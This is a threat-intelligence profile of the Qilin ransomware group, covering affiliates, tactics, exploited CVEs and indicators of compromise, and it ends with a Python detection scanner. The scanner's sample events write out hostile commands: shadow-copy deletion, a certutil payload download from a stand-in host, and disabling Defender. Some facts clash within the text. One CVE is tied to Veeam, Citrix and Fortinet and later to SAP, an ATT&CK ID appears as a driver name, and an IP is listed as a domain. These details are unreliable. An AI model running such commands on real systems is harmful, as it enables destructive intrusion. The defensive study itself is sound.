THREAT ACTOR

Qilin

THREAT LEVEL: 7.3
EMERGENCE DATE: Jul 2022
CATEGORY: Ransomware-as-a-Service
AFFILIATIONS: Strategic partnerships with Scattered Spider (UNC3944) and Moonstone Sleet (North Korea); infrastructure overlap with BianLian

DESCRIPTION

Qilin emerged in July 2022 as a Ransomware-as-a-Service (RaaS) operation, initially branded as Agenda before rebranding in September 2022. Operating through a mature affiliate model, the group provides advanced ransomware tools and infrastructure while employing double extortion tactics that combine data encryption with threats to leak stolen information on their dark web leak site.

CRITICALITY
Assesses the importance of the potential target, including their size/scale, data's value, and operational impact.
LETHALITY
Evaluates the potential for damage from the attack, including the ability to disrupt operations, cause financial loss, and damage public brand image.
AGGRESSIVENESS
Assesses the psychological and tactical intensity of the group’s behavior, including targeted harassment, violent language, blackmail, and political motives.

Classifications & Affiliations

Type: Ransomware-as-a-Service (RaaS)

Qilin operates independently while avoiding targets in the Commonwealth of Independent States (CIS), suggesting connections to Russian-speaking threat actors. Affiliate recruitment happens through underground forums and dark web platforms, with the network seeing major growth since late 2023. Affiliates typically receive 80-85% of ransom proceeds, earning higher percentages for larger payouts.

Current Status: Active, consistently posting dozens of new victims monthly across healthcare, manufacturing, financial services, and government sectors.

Threat Level: 7.3

Origins and Methodology

Built on a foundation of customization and cross-platform capabilities, Qilin has evolved into a significant enterprise threat through continuous technical refinement. The group's development of the Qilin.B variant and partnerships with established actors like Scattered Spider reflect its maturity in the ransomware ecosystem.

What is the Evolution of Qilin Ransomware?
1. Formation

Launched as Agenda in July 2022, the operation rebranded to Qilin in September 2022. Since then, it has steadily expanded both technical capabilities and its affiliate network through continuous platform improvements.

2. Evolution

Transitioning from Golang to Rust marked a turning point, bringing better performance and enhanced cross-platform capabilities. The Qilin.B variant introduced in fall 2024 added dynamic encryption selection and improved anti-forensic features, representing the group's most advanced iteration yet.

3. Lineage/Connections

Qilin maintains strategic partnerships with Scattered Spider (UNC3944), which has adopted Qilin payloads for targeted financial sector campaigns. North Korean threat actors associated with Moonstone Sleet have deployed Qilin ransomware, which, according to Microsoft, represented the first instance that the state-sponsored actors deployed ransomware developed by a Ransomware-as-a-Service operator. Infrastructure analysis reveals technical overlap with BianLian operations, suggesting shared resources or operational knowledge.

Strategic partnerships define much of the group's operational approach. Scattered Spider (UNC3944) has integrated Qilin payloads into financial sector campaigns, while North Korean actors linked to Moonstone Sleet have also deployed the ransomware. Infrastructure overlaps with BianLian suggest shared resources or operational knowledge between groups.

Which Unique Techniques Does Qilin Use?


Infection Vectors

Initial compromise typically occurs through spear phishing campaigns and exploitation of exposed services. The group actively targets vulnerabilities in Citrix ADC, RDP, Fortinet devices, and VMware ESXi systems. Post-compromise tools include RMM software and Cobalt Strike for establishing control. Recent campaigns heavily leverage CVE-2024-21762 and CVE-2024-55591 against Fortinet infrastructure.

Target Selection

Large enterprises remain the primary focus, particularly in healthcare, manufacturing, financial services, and government sectors. Healthcare organizations make up more than 10% of victims, especially those running extensive virtual infrastructure. While United States entities see the most activity, automated Fortinet exploitation has expanded operations into Spanish-speaking countries.

Operational Complexity

Attacks unfold in distinct phases starting with careful reconnaissance and credential collection. After establishing persistence, operators move laterally through networks before initiating data theft and finally deploying encryption. Affiliates tailor each attack, customizing file extensions, termination lists, and ransom demands to match their targets. Advanced features include multi-threaded encryption and robust anti-forensic capabilities.

Key Features & Technical Details

Qilin’s ransomware stands out due to its advanced encryption, modularity, and cross-platform adaptability, making it a formidable tool in the hands of affiliates. The ransomware allows for a high degree of customization, enabling affiliates to tailor their attacks based on the target’s infrastructure. This flexibility has contributed to Qilin’s rise in prominence in the ransomware space. Below is a detailed breakdown of Qilin’s technical features and capabilities.

Encryption Method: Implements ChaCha20, AES-256-CTR, and RSA-4096 with OAEP padding, selecting between algorithms based on target hardware for optimal speed.
File Extension: Affiliates configure custom extensions such as .MmXReVIxLV per campaign.
Ransom Note: Customizable templates adapted for each victim organization.
Double Extortion: Combines file encryption with data theft, threatening release on Tor-hosted leak sites for non-payment.
Communication Channels: Primary C2 infrastructure operates through 188.34.188.7 with multiple fallback servers.
Deployment Speed: Full attack chains typically execute over 24-72 hours.
Payment Method: Accepts Bitcoin or Monero.
Operational Model: RaaS structure providing an 80-85% revenue share to affiliates.

Activities

The group maintains a high operational tempo, posting victims consistently across multiple sectors, with a particular focus on organizations where operational disruption carries severe consequences, and uses double extortion to maximize pressure on victims.

Which Industries Are Most Vulnerable to Qilin?

Industrial and manufacturing organizations see the heaviest targeting, as operational disruptions in these sectors often force rapid ransom payments. Professional services firms and healthcare providers also face regular attacks, with the group recognizing their need for continuous operations and sensitive data handling. Consumer retail and technology companies experience steady targeting, while government entities face less frequent but highly disruptive incidents.

Geographic patterns show United States organizations bearing the majority of attacks, though automated scanning and exploitation tools have pushed operations into Latin America and Spanish-speaking regions. Any organization running VMware ESXi faces heightened risk given the group's specialized tooling for virtual environments. Similarly, exposed RDP endpoints, unpatched Fortinet appliances, or outdated Citrix ADC installations create easy entry points for initial access.

Modus Operandi

Each attack follows a methodical progression designed to maximize impact while avoiding detection.

Initial Access

Exploits vulnerabilities in Citrix ADC (CVE-2023-3519), Fortinet devices (CVE-2024-21762, CVE-2024-55591), and exposed RDP services. Spear phishing campaigns deliver malicious attachments while operators leverage brute force attacks, stolen passwords from initial access brokers, and weak credentials.

Additional vectors include cross-system credential spraying, RDP & service account hijacking, and zero-day exploitation of CVE-2025-31324 targeting public-facing Veeam, Citrix, and Fortinet systems.

Reconnaissance

Maps networks through Active Directory enumeration using PowerShell AD queries, ShareFinder.ps1, BloodHound, and MassSQL to identify domain controllers, backup systems, and critical infrastructure. Angry IP Scanner provides additional network reconnaissance capabilities.

Remote Access and C2 Tooling

Deploys RMM tools including AnyDesk, TeamViewer, ScreenConnect, and RDP alongside Cobalt Strike and Sliver C2 beacons. PowerShell scripts harvest stored Chrome credentials to expand access across compromised environments.

Privilege Escalation and Defense Evasion

Uses token impersonation and Pass-The-Hash (PTH) techniques while exploiting Microsoft antivirus weaknesses through unpatched service paths and weak GPOs. Deploys Bring Your Own Vulnerable Driver (BYOVD) attacks for DLL sideloading and abuses scheduled tasks running as SYSTEM. The Rust-based variants add complexity to forensic analysis while operators disable security services (T1562).

PowerShell/batch scripts disable Windows Defender while BYOVD attacks using T1068.sys driver bypass security controls. Leverages trusted binaries like certutil.exe, bitsadmin.exe, and powershell.exe for payload delivery while bypassing UAC through legitimate tools with signed certificates. Performs network-wide security policy tampering and manipulates default-admin-REG configurations.

Credential Access

Harvests credentials through keyloggers, memory dumps, and browser stores, focusing on domain administrator privileges. Embedded Mimikatz extracts credentials directly from LSASS process memory for unrestricted network access.

Command and Control

Maintains encrypted communication through C2 infrastructure at 193.106.175.107, 45.134.140.69, and backup servers. QDoor deployments establish persistent Cobalt Strike/Sliver beacons for interactive access while preventing traffic inspection.

Lateral Movement

Spreads via SMB/Admin shares (T1021.002), WinRM, and WMI using winrm.exe, PowerShell, and Impacket's wmiexec.py. PsExec (native and Impacket's psexec.py) and RDP enable manual operations, while legitimate RMM tools blend malicious activity with normal administration.

Exfiltration

Steals data using WinSCP, 7-Zip, WinRAR, PowerShell, Rclone with Mega.nz, Google Drive, Dropbox, and HTTPS tunnels via Cobalt Strike/Sliver. FTP/WebDAV connections to controlled infrastructure and Bluetooth for air-gapped networks ensure data theft completes before encryption begins.

Persistence

Establishes multiple backdoors through scheduled tasks (T1053) and boot-time scripts (T1547) across critical systems to survive partial remediation attempts.

Impact

Creates severe operational disruption through systematic encryption, particularly devastating for VMware ESXi environments. A multi-pass encryption technique makes recovery without the key harder and protects the operation while encryption is in progress.

Encryption

Deploys ChaCha20, AES-256-CTR, or RSA-4096 encryption (T1486), with the Qilin.B variant automatically selecting the optimal algorithm. Terminates a configurable list of processes, supports several encryption modes (normal, step-step, fast, percent) with exclusion lists, and performs multi-threaded selective encryption with custom extensions. Deployment occurs via admin shares or GPO, with self-deletion after execution.

Ransom Demand

Demands range from $50,000 to several million with outliers reaching $50 million.

Anti-Forensics

Removes forensic evidence by deleting Volume Shadow Copies (T1490) using vssadmin.exe, disabling restore points, and wiping logs. Prevents safe mode access and implements multi-phase log clearing through PowerShell automation. Maintains continuous forensic evidence removal and event log clearing throughout operations. Self-deleting executables minimize attack traces.

Indicators of Compromise (IOCs)

Network defenders should monitor for these specific artifacts that indicate potential Qilin activity.


File Hashes

SHA256: 9e1f8165ca3265ef0ff2d479370518a5f3f4467cd31a7b4b006011621a2dd752 for primary ransomware binary
MD5: 64ca549e78ad1bd3a4bd2834b0f81080 for Qilin variant

IP Addresses

193.106.175.107 (primary C2 server)
45.134.140.69 (backup infrastructure)
184.174.96.70 (data exfiltration)
180.131.145.73 (affiliate panel)
184.174.96.74 (additional C2)

Domains/URLs

188.34.188.7 (C2 communication endpoint)

File Names

decryptor_399060b2.exe (decryption tool)
enc.exe (encryption binary)

File Extensions

.MmXReVIxLV
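As an added example that is not part of this profile: a small Python scanner that applies the behavioural patterns described in the Modus Operandi section (vssadmin shadow-copy deletion, Defender tampering via PowerShell, certutil/bitsadmin downloads, wmiexec-style execution) and the IP and hash indicators listed above to process-creation events. The event field names and the sample events are assumptions and are constructed here, not real telemetry.

```python
import re

# IOCs from the profile above: C2/exfiltration IPs and sample hashes.
QILIN_IPS = {"193.106.175.107", "45.134.140.69", "184.174.96.70",
             "180.131.145.73", "184.174.96.74", "188.34.188.7"}
QILIN_HASHES = {"9e1f8165ca3265ef0ff2d479370518a5f3f4467cd31a7b4b006011621a2dd752",
                "64ca549e78ad1bd3a4bd2834b0f81080"}

# Behavioural rules (ATT&CK id, description, regex over "image cmdline") for tradecraft the profile attributes to Qilin operators.
RULES = [
    ("T1490", "shadow copy deletion via vssadmin",
     re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows", re.I)),
    ("T1562.001", "Defender protection disabled via Set-MpPreference",
     re.compile(r"Set-MpPreference\s+-Disable\w+\s+\$?true", re.I)),
    ("T1105", "payload download through certutil/bitsadmin",
     re.compile(r"certutil(\.exe)?\s.*-urlcache|bitsadmin(\.exe)?\s+/transfer", re.I)),
    ("T1021.002", "wmiexec-style output redirect to ADMIN$ share",
     re.compile(r"\\\\[\w.]+\\ADMIN\$\\__\d", re.I)),
]

def scan_events(events):
    """Return (host, attck_id, detail) hits for behavioural rules and IOC matches."""
    hits = []
    for ev in events:
        text = f"{ev.get('image', '')} {ev.get('cmdline', '')}"
        for attck, desc, rx in RULES:
            if rx.search(text):
                hits.append((ev["host"], attck, desc))
        if ev.get("dest_ip") in QILIN_IPS:
            hits.append((ev["host"], "IOC", f"connection to known Qilin IP {ev['dest_ip']}"))
        if {ev.get("sha256", "").lower(), ev.get("md5", "").lower()} & QILIN_HASHES:
            hits.append((ev["host"], "IOC", "binary hash matches a known Qilin sample"))
    return hits

# Constructed sample process-creation events (Sysmon Event ID 1 shape), not real telemetry.
SAMPLE_EVENTS = [
    {"host": "srv01", "image": r"C:\Windows\System32\vssadmin.exe",
     "cmdline": "vssadmin.exe delete shadows /all /quiet"},
    {"host": "ws07", "image": r"C:\Windows\System32\certutil.exe", "dest_ip": "193.106.175.107",
     "cmdline": "certutil.exe -urlcache -split -f http://staging.invalid/enc.exe enc.exe"},
    {"host": "ws07", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell.exe -c "Set-MpPreference -DisableRealtimeMonitoring $true"'},
    {"host": "ws09", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /Q /c whoami 1> \\127.0.0.1\ADMIN$\__1712345678.9 2>&1"},
    {"host": "ws09", "image": r"C:\Users\Public\enc.exe", "cmdline": "enc.exe",
     "sha256": "9e1f8165ca3265ef0ff2d479370518a5f3f4467cd31a7b4b006011621a2dd752"},
    {"host": "ws03", "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe notes.txt", "dest_ip": "10.20.30.40"},
]
```

Calling scan_events(SAMPLE_EVENTS) yields one hit per matching rule or indicator, so the benign notepad event on ws03 produces nothing while the certutil event on ws07 produces both a behavioural and an IOC hit.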

Exploits and Vulnerabilities


Citrix ADC RCE: CVE-2023-3519 (CVSS 9.8), unauthenticated remote code execution
ZeroLogon: CVE-2020-1472 (CVSS 10.0), Active Directory compromise without authentication
Windows SMB: CVE-2020-0787 (CVSS 7.8), BITS elevation to SYSTEM
Fortinet Auth Bypass: CVE-2024-21762 (CVSS 9.6), authentication bypass in FortiOS
Fortinet RCE: CVE-2024-55591 (CVSS 9.8), remote code execution without authentication
SAP Zero-Day: CVE-2025-31324 (CVSS 10.0), pre-disclosure exploitation

Beyond these specific vulnerabilities, attacks often exploit weak VPN configurations, exposed RDP services, and unpatched systems. Social engineering through targeted spear phishing remains a consistent initial access method.